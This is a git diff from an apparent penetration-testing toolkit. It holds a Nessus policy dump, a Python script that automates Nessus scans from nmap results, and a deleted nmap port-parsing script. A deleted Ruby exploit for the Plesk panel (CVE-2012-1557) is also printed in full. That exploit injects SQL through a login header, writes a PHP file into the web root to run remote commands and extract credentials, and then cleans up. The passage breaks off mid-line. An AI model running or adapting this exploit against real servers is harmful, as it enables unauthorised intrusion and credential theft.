SCAP Benchmark ID #2 : 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[entry]:SCAP Data Stream ID (1.2 only) #2 : entry SCAP Data Stream ID (1.2 only) #2 : 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[radio]:SCAP Version #2 : radio SCAP Version #2 : 1.2;1.1;1.0 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[file]:SCAP File (zip) #2 : file SCAP File (zip) #2 : 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[radio]:OVAL Result Type #1 : radio OVAL Result Type #1 : Full results w/ system characteristics;Full results w/o system characteristics;Thin results 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[entry]:SCAP Profile ID #1 : entry SCAP Profile ID #1 : 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[entry]:SCAP Benchmark ID #1 : entry SCAP Benchmark ID #1 : 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[entry]:SCAP Data Stream ID (1.2 only) #1 : entry SCAP Data Stream ID (1.2 only) #1 : 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[radio]:SCAP Version #1 : radio SCAP Version #1 : 1.2;1.1;1.0 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[file]:SCAP File (zip) #1 : file SCAP File (zip) #1 : 66963 Good MDM Settings Good MDM Settings[checkbox]:Verify SSL Certificate : checkbox Verify SSL Certificate : no 66963 Good MDM Settings Good MDM Settings[checkbox]:SSL : checkbox SSL : yes 66963 Good MDM Settings Good MDM Settings[password]:Password : password Password : 66963 Good MDM Settings Good MDM Settings[entry]:Username : entry Username : 66963 Good MDM Settings Good MDM Settings[entry]:Domain : entry Domain : 66963 Good MDM Settings Good MDM Settings[entry]:Port : entry Port : 66963 Good MDM Settings Good MDM Settings[entry]:GMC Server : entry GMC Server : 72904 MobileIron API Settings MobileIron API Settings[checkbox]:Verify SSL certificate : checkbox Verify SSL certificate : no 72904 MobileIron API Settings MobileIron API Settings[checkbox]:SSL : checkbox SSL : yes 72904 MobileIron API Settings MobileIron API Settings[password]:MobileIron password : password MobileIron password : 72904 MobileIron API Settings MobileIron API Settings[entry]:MobileIron username : entry MobileIron username : 72904 MobileIron API Settings MobileIron API Settings[entry]:MobileIron port : entry MobileIron port : 72904 MobileIron API Settings MobileIron API Settings[entry]:MobileIron VSP Admin Portal URL : entry MobileIron VSP Admin Portal URL : 73490 Amazon Web Services Settings Amazon Web Services Settings[checkbox]:Verify SSL Certificate : checkbox Verify SSL Certificate : yes yes 73490 Amazon Web Services Settings Amazon Web Services Settings[checkbox]:SSL : checkbox SSL : yes yes 73490 Amazon Web Services Settings Amazon Web Services Settings[password]:AWS Secret Access Key : password AWS Secret Access Key : 73490 Amazon Web Services Settings Amazon Web Services Settings[password]:AWS Access Key ID : password AWS Access Key ID : 73490 Amazon Web Services Settings Amazon Web Services Settings[checkbox]:Region us-gov-west-1 : checkbox Region us-gov-west-1 : no no 73490 Amazon Web Services Settings Amazon Web Services Settings[checkbox]:Region cn-north-1 : checkbox Region cn-north-1 : no no 73490 Amazon Web Services Settings Amazon Web Services Settings[checkbox]:Region sa-east-1 : checkbox Region sa-east-1 : no no 73490 Amazon Web Services Settings Amazon Web Services Settings[checkbox]:Region ap-southeast-2 : checkbox Region ap-southeast-2 : no no 73490 Amazon Web Services Settings Amazon Web Services Settings[checkbox]:Region ap-southeast-1 : checkbox Region ap-southeast-1 : no no 73490 Amazon Web Services Settings Amazon Web Services Settings[checkbox]:Region ap-northeast-1 : checkbox Region ap-northeast-1 : no no 73490 Amazon Web Services Settings Amazon Web Services Settings[checkbox]:Region eu-west-1 : checkbox Region eu-west-1 : no no 73490 Amazon Web Services Settings Amazon Web Services Settings[checkbox]:Region us-west-2 : checkbox Region us-west-2 : no no 73490 Amazon Web Services Settings Amazon Web Services Settings[checkbox]:Region us-west-1 : checkbox Region us-west-1 : no no 73490 Amazon Web Services Settings Amazon Web Services Settings[checkbox]:Region us-east-1 : checkbox Region us-east-1 : no no 73980 Hosts File Whitelisted Entries Hosts File Whitelisted Entries[file]:Upload file with custom hosts entries : file Upload file with custom hosts entries : 76460 AirWatch API Settings AirWatch API Settings[checkbox]:Verify SSL certificate : checkbox Verify SSL certificate : no 76460 AirWatch API Settings AirWatch API Settings[checkbox]:SSL : checkbox SSL : yes 76460 AirWatch API Settings AirWatch API Settings[entry]:AirWatch API key : entry AirWatch API key : 76460 AirWatch API Settings AirWatch API Settings[password]:AirWatch password : password AirWatch password : 76460 AirWatch API Settings AirWatch API Settings[entry]:AirWatch username : entry AirWatch username : 76460 AirWatch API Settings AirWatch API Settings[entry]:AirWatch port : entry AirWatch port : 76460 AirWatch API Settings AirWatch API Settings[entry]:AirWatch Environment API URL : entry AirWatch Environment API URL : 76512 MongoDB Settings MongoDB Settings[entry]:Port : entry Port : 27017 76512 MongoDB Settings MongoDB Settings[entry]:Database for authentication : entry Database for authentication : 76512 MongoDB Settings MongoDB Settings[password]:Password : password Password : 76512 MongoDB Settings MongoDB Settings[entry]:Username : entry Username : 76710 Salesforce.com Settings Salesforce.com Settings[password]:Password : password Password : 76710 Salesforce.com Settings Salesforce.com Settings[entry]:Username : entry Username : 76866 Patch Management: Dell KACE K1000 Settings Patch Management: Dell KACE K1000 Settings[password]:K1000 Database Password : password K1000 Database Password : 76866 Patch Management: Dell KACE K1000 Settings Patch Management: Dell KACE K1000 Settings[entry]:K1000 Database Username : entry K1000 Database Username : R1 76866 Patch Management: Dell KACE K1000 Settings Patch Management: Dell KACE K1000 Settings[entry]:K1000 Organization Database Name : entry K1000 Organization Database Name : ORG1 76866 Patch Management: Dell KACE K1000 Settings Patch Management: Dell KACE K1000 Settings[entry]:K1000 Database Port : entry K1000 Database Port : 3306 76866 Patch Management: Dell KACE K1000 Settings Patch Management: Dell KACE K1000 Settings[entry]:K1000 Address : entry K1000 Address : 77089 RHEV Settings RHEV Settings[checkbox]:Verify SSL Certificate : checkbox Verify SSL Certificate : no 77089 RHEV Settings RHEV Settings[entry]:Port : entry Port : 443 77089 RHEV Settings RHEV Settings[password]:Password : password Password : 77089 RHEV Settings RHEV Settings[entry]:Username : entry Username : 78013 Patch Management: Symantec Altiris Settings Patch Management: Symantec Altiris Settings[password]:Symantec Altiris Database Password : password Symantec Altiris Database Password : 78013 Patch Management: Symantec Altiris Settings Patch Management: Symantec Altiris Settings[entry]:Symantec Altiris Database Username : entry Symantec Altiris Database Username : 78013 Patch Management: Symantec Altiris Settings Patch Management: Symantec Altiris Settings[checkbox]:Symantec Altiris Use Windows Credentials : checkbox Symantec Altiris Use Windows Credentials : no 78013 Patch Management: Symantec Altiris Settings Patch Management: Symantec Altiris Settings[entry]:Symantec Altiris Database Name : entry Symantec Altiris Database Name : Symantec_CMDB 78013 Patch Management: Symantec Altiris Settings Patch Management: Symantec Altiris Settings[entry]:Symantec Altiris Database Port : entry Symantec Altiris Database Port : 5690 78013 Patch Management: Symantec Altiris Settings Patch Management: Symantec Altiris Settings[entry]:Symantec Altiris Database Server : entry Symantec Altiris Database Server : template_policy yes wizard_uuid ad629e16-03b6-8c1d-cef6-ef8c9dd3c658d24bd260ef5f9e66 local_portscan.snmp yes portscan.ping yes local_portscan.netstat_wmi yes port_range 0-1000 plugin_selection.individual_plugin.34220 enabled reverse_lookup no network_scanners.udp no slice_network_addresses no checks_read_timeout 5 plugin_selection.individual_plugin.34277 disabled stop_scan_on_disconnect no name PolicyName local_portscan.netstat_ssh yes silent_dependencies yes reduce_connections_on_congestion no plugin_selection.individual_plugin.14272 enabled use_kernel_congestion_detection no network_scanners.tcp no plugin_selection.individual_plugin.11219 enabled allow_post_scan_editing yes max_checks 5 max_hosts 30 service_detection.search_for_ssl yes network_scanners.syn yes log_whole_attack no plugin_selection.individual_plugin.14274 enabled unscanned_closed no plugin_selection.individual_plugin.10335 disabled safe_checks yes ui.aws.region_category Rest of the World plugin_selection.individual_plugin.10180 enabled Port scanners mixed PolicyName " + +#https://192.168.112.160:8834/nessus6-api.html#/ + +origUrl = '' +verify = False +token = "" +username = '' +password = '' +filename = "test.nessus" +headers = {} + +def parseNmapReport(reportFile): + criticalList=[] + highList=[] + mediumList=[] + + print reportFile + with open(reportFile, 'rb') as csvfile: + reader = csv.DictReader(csvfile,delimiter=',') + for row in reader: + if row['Risk']!='None': + result = ([row['Risk'],row['Host']+':'+row['Port'],row['Name']]) + if row['Risk']=='Critical': + if result not in criticalList: + criticalList.append(result) + if row['Risk']=='High': + if result not in highList: + highList.append(result) + if row['Risk']=='Medium': + if result not in mediumList: + mediumList.append(result) + + print "\n- Summary of Results (Critical/High/Medium)" + if len(criticalList)<1 and len(highList)<1 and len(mediumList)<1: + print "- No results found" + + criticalList = sorted(criticalList, key=operator.itemgetter(0, 1)) + for x in criticalList: + print "%-10s %15s %80s" % (x[0], x[1], x[2]) + highList = sorted(highList, key=operator.itemgetter(0, 1)) + for x in highList: + print "%-10s %15s %80s" % (x[0], x[1], x[2]) + + mediumList = sorted(mediumList, key=operator.itemgetter(0, 1)) + for x in mediumList: + print "%-10s %15s %80s" % (x[0], x[1], x[2]) + +def setHeaders(contentType="",token=""): + if contentType=="json": + headers = {'X-Cookie': 'token='+token, + 'content-type': 'application/json'} + else: + headers = {'X-Cookie': 'token='+token} + return headers + +def login(username,password): + headers=setHeaders(contentType="json") + login = {'username': username, 'password': password} + data = json.dumps(login) + r = requests.post(origUrl+"/session", data=data, headers=headers, verify=verify) + data = json.loads(r.text) + token = data['token'] + return token + +def upload_file(filename,token): + headers=setHeaders(contentType="",token=token) + url = origUrl+"/file/upload" + files = {"Filedata": open(filename, 'rb')} + r = requests.post(url = url, headers = headers, data = {'Filename':filename}, files = files, verify = verify) + if r.status_code==200: + data = json.loads(r.text) + filename = data['fileuploaded'] + return filename + else: + return None + +def import_policy(filename,token): + headers=setHeaders(contentType="json",token=token) + login = {'file': filename} + data = json.dumps(login) + url = origUrl+"/policies/import" + r = requests.post(url = url, data=data, headers=headers, verify=verify) + data = json.loads(r.text) + uuid = data['template_uuid'] + policy_id = data['id'] + return (uuid,policy_id) + +def get_policy(policy_id,token): + headers=setHeaders(contentType="json",token=token) + url = origUrl+"/policies/"+str(policy_id)+"/export" + r = requests.get(url = url, headers=headers, verify=verify) + #data = json.loads(r.text) + #return data + return r.text + +def list_policy(token): + headers=setHeaders(contentType="json",token=token) + url = origUrl+"/policies/" + r = requests.get(url = url, headers=headers, verify=verify) + data = json.loads(r.text) + return data + +#def list_policy(token): +# headers=setHeaders(contentType="json",token=token) +# url = origUrl+"/policies" +# #url = origUrl+"/editor/policy/templates" +# r = requests.get(url = url, headers=headers, verify=verify) +# data = json.loads(r.text) +# return data + +def list_scans(token): + headers=setHeaders(contentType="json",token=token) + r = requests.get(origUrl+"/scans", headers=headers, verify=verify) + data = json.loads(r.text) + return data + +def add_scan(uuid,policy_id,targets,token): + headers=setHeaders(contentType="json",token=token) + data = {"uuid":uuid, "settings": {"policy_id": policy_id, "name": "Scan Name", "description": "Scan Description", "text_targets": targets}} + data = json.dumps(data) + r = requests.post(origUrl+"/scans", data=data, headers=headers, verify=verify) + data = json.loads(r.text) + return data + +def start_scan(uuid,scan_id,token): + headers=setHeaders(contentType="json",token=token) + data = {"scan_uuid":uuid} + data = json.dumps(data) + r = requests.post(origUrl+"/scans/"+str(scan_id)+"/launch", data=data, headers=headers, verify=verify) + data = json.loads(r.text) + return data + +def extractIP(filename): + root = etree.parse(filename) + addrList = [port.get('addr') for port in root.findall('.//address')] + count=0 + addrList = list(set(addrList)) + addrStr = ",".join(addrList) + return addrStr + +def extractPorts(filename): + resultList=[] + root = etree.parse(filename) + stateList = [port.get('state') for port in root.findall('.//state')] + portsList = [port.get('portid') for port in root.findall('.//port')] + + count=0 + for x in stateList: + if x=="open": + resultList.append(portsList[count]) + count+=1 + resultList = list(set(resultList)) + portsStr = ",".join(resultList) + return portsStr + +#def modifyPolicy(portsStr): +# doc = etree.parse(StringIO(defaultNessusPolicy)) +# #doc = etree.parse(filename) +# for elem in doc.findall("/Policy/Preferences/ServerPreferences/preference/value"): +# if elem.text=="PolicyName": +# elem.text="scan_"+str(uuid.uuid4()) +# if elem.text=="0-1000": +# elem.text=portsStr +# for elem in doc.findall("Policy/policyName"): +# if elem.text=="PolicyName": +# elem.text="scan_"+str(uuid.uuid4()) +# doc.write('output.nessus', xml_declaration=False) +# return "output.nessus" + +def modifyPolicy(portsStr): + doc = etree.parse(StringIO(defaultNessusPolicy)) + found=False + for elem in doc.findall("/Policy/Preferences/ServerPreferences/preference"): + for node in elem: + if found==True: + if node.tag=="value": + node.text = portsStr + found=False + if node.tag=="name": + if node.text=="port_range": + found=True + doc.write('output.nessus', xml_declaration=False) + return "output.nessus" + +def request_report(scan_id,format,token): + headers=setHeaders("json",token) + if format=="csv": + data = {'scan_id':scan_id,'format':'csv'} + data = json.dumps(data) + r = requests.post(origUrl+"/scans/"+str(scan_id)+"/export/", data=data, headers=headers, verify=verify) + data = json.loads(r.text) + return data + +def download_report(file_id,scan_id,format,token): + headers=setHeaders("json",token) + if format=="csv": + data = {'scan_id': scan_id, 'format': 'csv'} + data = json.dumps(data) + r = requests.get(origUrl+"/scans/"+str(scan_id)+"/export/"+str(file_id)+"/download", data=data, headers=headers, verify=verify) + return r.text + + + +if __name__== '__main__': + parser= argparse.ArgumentParser() + parser.add_argument('-s', dest='hostIP', action='store', help='[nessus server IP]') + parser.add_argument('-u', dest='username', action='store', help='[username]') + parser.add_argument('-p', dest='password', action='store', help='[password]') + parser.add_argument('-i', dest='infile', action='store', help='[nmap xml file]') + parser.add_argument('-t', dest='templatefile', action='store', help='[Nessus policy template to use (optional)]') + parser.add_argument('-n', dest='scanid', action='store', help='[lookup job based on scan_id (optional)]') + parser.add_argument('-o', dest='outfile', action='store', help='[nessus report (csv) (optional)]') + + if len(sys.argv)==1: + parser.print_help() + sys.exit(1) + + options= parser.parse_args() + if not options.username and not options.password: + print "- Enter a username and password to connect to Nessus" + sys.exit() + if not options.hostIP: + print "- Enter the Nessus server IP address" + sys.exit() + else: + hostIP = options.hostIP + origUrl = 'https://'+hostIP+':8834' + + if options.scanid: + scan_id = options.scanid + username = options.username + password = options.password + + print "- Logging into Nessus" + token = login(username,password) + + found=False + while found==False: + results=list_scans(token) + for x in results['scans']: + if str(x['id'])==str(scan_id): + print "- Checking Job Status: "+str(scan_id)+" : "+str(x['status']) + if x['status']=='canceled' or x['status']=='completed': + found=True + time.sleep(5) + + results = request_report(scan_id,"csv",token) + + file_id = results['file'] + + results = download_report(file_id,scan_id,"csv",token) + + if options.outfile: + #results = download_report(file_id,scan_id,"csv",token) + file = open(options.outfile, "w") + file.write(results.encode('ascii', 'ignore').decode('ascii')) + file.close() + print "\n- Nessus report has been saved to: "+options.outfile + parseNmapReport(options.outfile) + else: + outfile = "report.csv" + #results = download_report(file_id,scan_id,"csv",token) + file = open("report.csv", "w") + file.write(results.encode('ascii', 'ignore').decode('ascii')) + file.close() + print "\n- Nessus report has been saved to: report.csv" + parseNmapReport(outfile) + sys.exit() + if options.infile: + username = options.username + password = options.password + + print "- Launching new Nessus scan" + filename = options.infile + resultStr="" + + print "- Extracting ports from "+filename + addrStr = extractIP(filename) + + portsStr =extractPorts(filename) + resultStr += portsStr+"," + + portStr = resultStr[:-1] + + print "- Modifying Nessus policy" + filename="nessusPolicy.xml" + filename = modifyPolicy(portsStr) + + print "- Logging into Nessus" + token = login(username,password) + + if options.templatefile: + foundPolicy=False + results = list_policy(token) + for x in results['policies']: + if options.templatefile==x['name']: + policy_id = x['id'] + defaultNessusPolicy = get_policy(policy_id,token) + modifyPolicy(portsStr) + foundPolicy=True + if foundPolicy==False: + print "- Cannot find Nessus policy name" + sys.exit() + + + print "- Uploading Policy" + filename = upload_file(filename,token) + if filename!=None: + (uuid,policy_id) = import_policy(filename,token) + + targets = addrStr + results = add_scan(uuid,policy_id,targets,token) + + uuid = results['scan']['uuid'] + scan_id = results['scan']['id'] + + print "- Starting Nessus Scan" + start_scan(uuid,scan_id,token) + + found=False + while found==False: + results=list_scans(token) + for x in results['scans']: + if str(x['id'])==str(scan_id): + print "- Checking Job Status: "+str(scan_id)+" : "+str(x['status']) + if x['status']=='canceled' or x['status']=='completed': + found=True + time.sleep(5) + + results = request_report(scan_id,"csv",token) + file_id = results['file'] + + if options.outfile: + results = download_report(file_id,scan_id,"csv",token) + file = open(options.outfile, "w") + file.write(results.encode('ascii', 'ignore').decode('ascii')) + file.close() + print "- Nessus report has been saved to: "+options.outfile + parseNmapReport(options.outfile) + + else: + outfile = "report.csv" + results = download_report(file_id,scan_id,"csv",token) + file = open("report.csv", "w") + file.write(results.encode('ascii', 'ignore').decode('ascii')) + file.close() + print "- Nessus report has been saved to: report.csv" + parseNmapReport(outfile) \ No newline at end of file diff --git a/networking/README.md b/networking/README.md new file mode 100755 index 0000000..128fd02 --- /dev/null +++ b/networking/README.md @@ -0,0 +1,3 @@ +- ip2domains.py +Extracts the common name from the SSL certificate (if its not a wildcard domain). +Performs a reverse lookup on Bing for domains hosted on the IP address \ No newline at end of file diff --git a/ip2domains.py b/networking/ip2domains.py similarity index 100% rename from ip2domains.py rename to networking/ip2domains.py diff --git a/niktohelper/niktohelper.py b/niktohelper/niktohelper.py index 97b06ae..c430fdf 100755 --- a/niktohelper/niktohelper.py +++ b/niktohelper/niktohelper.py @@ -172,8 +172,8 @@ def parseNmap(fname,child,displayOnly): if(count>2): i = i.strip() if 'http' in i: - result = re.search('Host:(.*)\(\)', i) - host = result.group(1).strip() + result = re.search('[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}', i) + host = result.group(0).strip() if host not in ipList: ipList.append(host) #Perform a reverse DNS lookup on Bing.com diff --git a/others/parseMSTports.py b/others/parseMSTports.py deleted file mode 100755 index 6c3d404..0000000 --- a/others/parseMSTports.py +++ /dev/null @@ -1,261 +0,0 @@ -#! /usr/bin/env python -# Sachin Agarwal, Google, Twitter: sachinkagarwal, Web: http://sites.google.com/site/sachinkagarwal/ -# November 2010 -# Using Python to execute a bunch of job strings on multiple processors and print out the results of the jobs in the order they were listed in the job list (e.g. serially). -# Partly adapted from http://jeetworks.org/node/81 - - -#These are needed by the multiprocessing scheduler -from multiprocessing import Queue -import multiprocessing -import commands -import sys -import sys -import commands,os -import nmap -import subprocess -import argparse -resultsEnd = [] - -#These are specific to my jobs requirement -import os -import re - -httpList = [] -sslList = [] -snmpList = [] -sshList = [] -scanTCPList = [] -scanUDPList = [] -filename = '' - -file = open("results.txt", "w") - -def generateCommands(): - print "Generating nmap commands" - filename = str(sys.argv[1]) - with open(filename) as f: - for line in f: - hostNo = line.split(":")[0] - inputStr = line.split(":")[1] - inputList = inputStr.split(" ") - tcpList=[] - udpList=[] - #print "\n" - file.write("\n"+hostNo+"\n") - for i in inputList: - if '/tcp' in i or '/TCP' in i: - tmpStr = i.replace('/tcp','') - tmpStr = tmpStr.replace('/TCP','') - tmpStr = (tmpStr.replace(',','')).replace(" ","").replace("\n","") - tcpList.append(tmpStr) - if '/udp' in i or '/UDP' in i: - tmpStr = i.replace('/udp','') - tmpStr = tmpStr.replace('/UDP','') - tmpStr = (tmpStr.replace(',','')).replace(" ","").replace("\n","") - udpList.append(tmpStr) - - tcpportNo = str(tcpList).strip('[]').replace("'","").replace(" ","") - udpportNo = str(udpList).strip('[]').replace("'","").replace(" ","") - if len(tcpportNo)>0 and len(udpportNo)>0: - arg = "sudo nmap -Pn -T4 -sT -sU -n -sV -A -v --open --script default -p T:"+tcpportNo+" U:"+udpportNo - cmd = arg+" "+hostNo - scanTCPList.append((hostNo,cmd)) - if len(tcpportNo)>0 and len(udpportNo)<1: - arg = "sudo nmap -Pn -T4 -sT -sU -n -sV -A -v --open --script default -p T:"+tcpportNo - cmd = arg+" "+hostNo - scanTCPList.append((hostNo,cmd)) - if len(tcpportNo)<1 and len(udpportNo)>0: - arg = "sudo nmap -Pn -T4 -sT -sU -n -sV -A -v --open --script default -p U:"+udpportNo - cmd = arg+" "+hostNo - scanTCPList.append((hostNo,cmd)) - - -def RunCommand (fullCmd): - try: - print fullCmd - return commands.getoutput(fullCmd) - except: - return "Error executing command %s" %(fullCmd) - - -class Worker(multiprocessing.Process): - - def __init__(self, - work_queue, - result_queue, - ): - # base class initialization - multiprocessing.Process.__init__(self) - self.work_queue = work_queue - self.result_queue = result_queue - self.kill_received = False - - def run(self): - while (not (self.kill_received)) and (self.work_queue.empty()==False): - try: - job = self.work_queue.get_nowait() - except: - break - - (jobid,runCmd) = job - rtnVal = (jobid,RunCommand(runCmd)) - self.result_queue.put(rtnVal) - -def extractPorts(results): - file = open("results.txt", "a+") - resultList = str(results).split("\n") - for i in resultList: - if "Nmap scan report for " in i: - hostNo = i.replace("Nmap scan report for ","") - file.write(hostNo+"\n") - if "/tcp" in i and "unknown" not in i and "tcpwrapped" not in i and "port" not in i: - outputStr = str(i).replace(" open "," ") - outputStr = outputStr.replace("?"," ") - resultsEnd.append(outputStr) - file.write(outputStr+"\n") - - if "http" in outputStr: - portStatus = outputStr.split("/tcp") - httpList.append((hostNo,portStatus[0],portStatus[1])) - if "ssl" in outputStr: - portStatus = outputStr.split("/tcp") - sslList.append((hostNo,portStatus[0],portStatus[1])) - if "ssh" in outputStr: - portStatus = outputStr.split("/tcp") - sshList.append((hostNo,portStatus[0],portStatus[1])) - - if "/udp" in i and "filtered" not in i and "unknown" not in i and "tcpwrapped" not in i and "port" not in i: - outputStr = str(i).replace(" open "," ") - outputStr = outputStr.replace("open|filtered","") - outputStr = outputStr.replace("?"," ") - resultsEnd.append(outputStr) - file.write(outputStr+"\n") - - if "snmp" in outputStr: - portStatus = outputStr.split("/udp") - snmpList.append((hostNo,portStatus[0],portStatus[1])) - file.close() - -def execute(jobs, num_processes=2): - # load up work queue - work_queue = multiprocessing.Queue() - for job in jobs: - work_queue.put(job) - - # create a queue to pass to workers to store the results - result_queue = multiprocessing.Queue() - - # spawn workers - worker = [] - for i in range(num_processes): - worker.append(Worker(work_queue, result_queue)) - worker[i].start() - - # collect the results from the queue - results = [] - while len(results) < len(jobs): #Beware - if a job hangs, then the whole program will hang - result = result_queue.get() - results.append(result) - results.sort() # The tuples in result are sorted according to the first element - the jobid - return (results) - - -#MAIN - -if __name__ == '__main__': - global filename - parser = argparse.ArgumentParser() - parser.add_argument('-f', action='store', help='[file containing directory listing]') - - if len(sys.argv)==1: - parser.print_help() - sys.exit(1) - - options = parser.parse_args() - if options.f: - filename = options.f - - generateCommands() - - import time #Code to measure time - starttime = time.time() #Code to measure time - - - jobs = [] #List of jobs strings to execute - jobid = 0#Ordering of results in the results list returned - - #Code to generate my job strings. Generate your own, or load joblist into the jobs[] list from a text file - lagFactor = 5 - for i in scanTCPList: - cmd = i[1] - #cmd = "nmap -Pn -T4 -sT -n -sV -A -v --open --script default -p 443,8009 58.215.166.36" - ctr = 0 - fullCmd = cmd #Linux command to execute - jobs.append((jobid,fullCmd)) # Append to joblist - jobid = jobid+1 - for i in scanUDPList: - cmd = i[1] - #cmd = "nmap -Pn -T4 -sT -n -sV -A -v --open --script default -p 443,8009 58.215.166.36" - ctr = 0 - fullCmd = cmd #Linux command to execute - jobs.append((jobid,fullCmd)) # Append to joblist - jobid = jobid+1 - # run - numProcesses = 10 - results = execute(jobs,numProcesses) #job list and number of worker processes - - #Code to print out results as needed by me. Change this to suit your own need - # dump results - ctr = 0 - for r in results: - (jobid, cmdop) = r - #if jobid % lagFactor == 0: - # print - # print jobid/lagFactor, - #print '\t', - #try: - #print cmdop - extractPorts(cmdop) - #print cmdop.split()[10], - #except: - # print "Err", - ctr = ctr+1 - print - - file1 = open("results_sorted.txt", "w") - results1 = "\n***** HTTP/HTTPs Servers *****" - print results1 - file1.write(results1+"\n") - for host in httpList: - if "ssl/http" in str(host): - results1 = "https://"+host[0]+":"+host[1] - print results1 - file1.write(results1+"\n") - if " http " in str(host): - results1 = "http://"+host[0]+":"+host[1] - print results1 - file1.write(results1+"\n") - results1 = "\n***** SSL Servers *****" - print results1 - file1.write(results1+"\n") - for host in sslList: - results1 = host[0]+":"+host[1] - print results1 - file1.write(results1+"\n") - results1 = "\n***** SNMP Servers *****" - print results1 - file1.write(results1+"\n") - for host in snmpList: - results1 = host[0]+":"+host[1] - print results1 - file1.write(results1+"\n") - results1 = "\n***** SSH Servers *****" - print results1 - file1.write(results1+"\n") - for host in sshList: - results1 = host[0]+":"+host[1] - print results1 - file1.write(results1+"\n") - file1.close() - print "Time taken = %f" %(time.time()-starttime) #Code to measure time diff --git a/plesk_panel/pleskSQL.rb b/plesk_panel/pleskSQL.rb deleted file mode 100755 index 932a6b6..0000000 --- a/plesk_panel/pleskSQL.rb +++ /dev/null @@ -1,144 +0,0 @@ -#!/bin/env ruby -#encoding: utf-8 - -require 'net/http' -require 'net/https' -require 'uri' - -#Reference: http://www.esecforte.com/blog/exploring-plesks-unspecified-vulnerability/ -#Reference: CVE-2012-1557 - -host = "" -port = "8443" -ssl = true - -randomNum = Random.new.rand(1_000_0..10_000_0-1) -outputFileName = "shllspider".to_s+(randomNum.to_i).to_s+".php" - -hostandport = host+":"+port - -stage1 = "';exec a..a--" -#puts stage2 -if ssl==true - url = URI.parse('https://'+hostandport+'/enterprise/control/agent.php ') -else - url = URI.parse('http://'+hostandport+'/enterprise/control/agent.php ') -end - -http = Net::HTTP.new(url.host, url.port) -http.use_ssl = true -http.verify_mode = OpenSSL::SSL::VERIFY_NONE -data = '' - -headers = { - 'HTTP_AUTH_LOGIN' => stage1, - 'HTTP_AUTH_PASSWD' => "spiderlabs", - 'Host' => hostandport, - 'Content-Type' => 'text/xml' -} - -resp = http.post(url.path, data, headers) -results = resp.body - -if results.include? "Login is incorrect" - puts "[*] Plesk panel is not vulnerable" - exit -end -results = results.match(/in <b>(.*)plib/m)[1] -localPath = results -puts "[*] Local path of Plesk installation: "+localPath - - - - -puts "[*] Extracting Plesk Panel credentials" -stage5 = "';DECLARE @li_file_sytem_object INT; DECLARE @li_result INT;DECLARE @li_file_id INT;EXECUTE @li_result = sp_OACreate 'Scripting.FileSystemObject', @li_file_sytem_object OUT;EXECUTE @li_result = sp_OAMethod @li_file_sytem_object, 'OpenTextFile', @li_file_id OUT,'"+localPath+"htdocs\\enterprise\\control\\"+outputFileName+"', 8, 1; EXECUTE @li_result = sp_OAMethod @li_file_id, 'WriteLine', NULL, '';---" - -url5 = URI.parse('https://'+hostandport+'/enterprise/control/agent.php ') -http5 = Net::HTTP.new(url5.host, url5.port) -http5.use_ssl = true -http5.verify_mode = OpenSSL::SSL::VERIFY_NONE -data5 = '' - -headers5 = { - 'Cookie' => 'PLESKSESSID=da4c205a20e18edc9ea9bc692cf65631', - 'HTTP_AUTH_LOGIN' => stage5, - 'HTTP_AUTH_PASSWD' => "spiderlabs", - 'Host' => hostandport, - 'Content-Type' => 'text/xml' -} -resp5 = http5.post(url5.path, data5, headers5) -results5 = resp5.body - - - - -puts "[*] Run command on remote server" -stage2 = "';DECLARE @li_file_sytem_object INT; DECLARE @li_result INT;DECLARE @li_file_id INT;EXECUTE @li_result = sp_OACreate 'Scripting.FileSystemObject', @li_file_sytem_object OUT;EXECUTE @li_result = sp_OAMethod @li_file_sytem_object, 'OpenTextFile', @li_file_id OUT,'"+localPath+"htdocs\\enterprise\\control\\"+outputFileName+"', 8, 1; EXECUTE @li_result = sp_OAMethod @li_file_id, 'WriteLine', NULL, ' ';---" - -url3 = URI.parse('https://'+hostandport+'/enterprise/control/agent.php ') -http3 = Net::HTTP.new(url3.host, url3.port) -http3.use_ssl = true -http3.verify_mode = OpenSSL::SSL::VERIFY_NONE -data3 = '' - -headers3 = { - 'HTTP_AUTH_LOGIN' => stage2, - 'HTTP_AUTH_PASSWD' => "spiderlabs", - 'Host' => hostandport, - 'Content-Type' => 'text/xml' -} -resp3 = http3.post(url3.path, data3, headers3) -results3 = resp3.body - - -windowsCmd = "ver" -stage2 = "';DECLARE @li_file_sytem_object INT; DECLARE @li_result INT;DECLARE @li_file_id INT;EXECUTE @li_result = sp_OACreate 'Scripting.FileSystemObject', @li_file_sytem_object OUT;EXECUTE @li_result = sp_OAMethod @li_file_sytem_object, 'OpenTextFile', @li_file_id OUT,'"+localPath+"htdocs\\enterprise\\control\\"+outputFileName+"', 8, 1; EXECUTE @li_result = sp_OAMethod @li_file_id, 'WriteLine', NULL, '';---" - -url3 = URI.parse('https://'+hostandport+'/enterprise/control/agent.php ') -http3 = Net::HTTP.new(url3.host, url3.port) -http3.use_ssl = true -http3.verify_mode = OpenSSL::SSL::VERIFY_NONE -data3 = '' - -headers3 = { - 'HTTP_AUTH_LOGIN' => stage2, - 'HTTP_AUTH_PASSWD' => "spiderlabs", - 'Host' => hostandport, - 'Content-Type' => 'text/xml' -} -resp3 = http3.post(url3.path, data3, headers3) -results3 = resp3.body - -newUrl = "https://"+hostandport+"/enterprise/control/"+outputFileName -print "[*] Write output to "+newUrl+"\n\n" -url2 = URI.parse("https://"+hostandport+"/enterprise/control/"+outputFileName) -http2 = Net::HTTP.new(url2.host, url2.port) -http2.use_ssl = true -http2.verify_mode = OpenSSL::SSL::VERIFY_NONE -data = '' -resp = http2.put(url2.path,data) -puts resp.body - - - - - - -puts "\n[*] Cleaning up and deleting file..." -stage4 = "';DECLARE @Result int;DECLARE @FSO_Token int;EXEC @Result = sp_OACreate 'Scripting.FileSystemObject', @FSO_Token OUTPUT;EXEC @Result = sp_OAMethod @FSO_Token, 'DeleteFile', NULL, '"+localPath+"htdocs\\enterprise\\control\\"+outputFileName+"';EXEC @Result = sp_OADestroy @FSO_Token;---" - -url4 = 